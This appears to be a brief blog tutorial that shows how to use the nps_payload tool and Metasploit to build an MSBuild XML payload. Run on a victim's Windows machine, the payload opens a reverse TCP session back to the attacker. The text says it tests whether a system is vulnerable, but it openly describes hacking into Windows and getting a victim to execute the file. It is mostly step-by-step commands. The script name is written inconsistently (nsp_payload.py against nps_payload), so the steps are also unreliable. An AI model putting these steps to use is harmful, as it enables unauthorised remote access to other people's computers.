In this tutorial, we will get to know if our windows system is vulnerable to XML or not.
for this tutorial, I will use a tool that is not too famous and I will also use the Metasploit whichh is quite famous these days.
ATTACK
first of all download this tool from GitHub with this command:
git clone https://github.com/trustedsec/nps_payload.git
now go to the download folder. we will use python3 to run this.
python3 nsp_payload.py
or
./nsp_payload.py
after running the command it will ask you to choose some options.
1. first we will choose to make a payload in XML
2. now it will ask you to choose among TCP HTTP and HTTPS. we will select 1 for TCP.
3. now give your local IP and local port.
our half work is done.
now that we have an XML and a Metasploit module, we can use these to hack into windows.
run this command to use the module:
msfconsole -r msbuild_nps.rc
after this, you will need to find a way to make your victim execute this file on a windows system with MSBuild.
go to cmd Microsoft.net framework dir and run this command:
MSbuild.exe msbuild_nps.xml
That’s it. now check your Metasploit. there might be a session. but if it doesn’t dont panic. it can take a while.
Thanks For Visiting.